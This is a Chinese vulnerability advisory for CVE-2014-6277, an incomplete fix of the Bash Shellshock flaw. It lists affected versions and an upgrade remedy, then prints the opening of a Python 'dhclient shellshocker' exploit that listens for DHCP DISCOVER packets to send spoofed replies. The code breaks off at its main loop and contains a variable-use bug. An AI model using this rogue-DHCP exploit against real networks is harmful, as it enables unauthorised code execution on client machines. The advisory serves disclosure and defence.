GNU Bash不完整修复远程代码执行漏洞(CVE

发布日期：2014-09-27
更新日期：2014-10-08

受影响系统：
GNU Bash <= 4.3 bash43-026
描述：
BUGTRAQ  ID: 70165
 CVE(CAN) ID: CVE-2014-6277

Bash，Unix shell的一种，在1987年由布莱恩·福克斯为了GNU计划而编写。

GNU Bash 4.3 bash43-026及之前版本没有正确解析环境变量值中的函数定义，这可使远程攻击者通过构造的环境，利用此漏洞执行任意代码或者造成拒绝服务。此漏洞源于CVE-2014-6271及CVE-2014-7169的不完整修复。

Gitlab-shell 受 Bash CVE-2014-6271 漏洞影响 

Linux再曝安全漏洞Bash 比心脏出血还严重

解决办法是升级 Bash，请参考这篇文章。

Linux Bash安全漏洞修复

<*来源：Michal Zalewski （lcamtuf@echelon.pl）
 
  链接：
 *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#!/usr/bin/python
 # Exploit Title: dhclient shellshocker
 # Google Dork: n/a
 # Date: 10/1/14
 # Exploit Author: @0x00string
 # Vendor Homepage: gnu.org
 # Software Link:
 # Version: 4.3.11
 # Tested on: Ubuntu 14.04.1
 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
 #  ______        ______  ______                _               
 # / __  |      / __  |/ __  |    _        (_)               
 #| | //| |_  _| | //| | | //| | ___| |_  ____ _ ____  ____  ___
 #| |// | ( \ / ) |// | | |// | |/___)  _) / ___) |  _ \ / _  |/___)
 #|  /__| |) X (|  /__| |  /__| |___ | |__| |  | | | | ( ( | |___ |
 # \_____/(_/ \_)\_____/ \_____/(___/ \___)_|  |_|_| |_|\_|| (___/
 #                                                      (_____|   
 #    _ _          _ _               
 #    | | |        | (_)            _ 
 #  _ | | | _  ____| |_  ____ ____ | |_
 # / || | || \ / ___) | |/ _  )  _ \|  _)
 #( (_| | | | ( (___| | ( (/ /| | | | |__
 # \____|_| |_|\____)_|_|\____)_| |_|\___)                                     
 #
 #      _          _ _      _                _             
 #    | |        | | |    | |              | |             
 #  ___| | _  ____| | | ___| | _  ___  ____| |  _ ____  ____
 # /___) || \ / _  ) | |/___) || \ / _ \ / ___) | / ) _  )/ ___)
 #|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | 
 #(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_| 

# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
 # once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
 # The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
 # can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.

import socket, struct
 def HexToByte( hexStr ):
    b = []
    h = ''.join( h.split(" ") )
    for i in range(0, len(h), 2):
        b.append( chr( int (h[i:i+2], 16 ) ) )
    return ''.join( b )

rport = 68
 lport = 67

bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

bsock.bind(("<broadcast>", lport))

while True: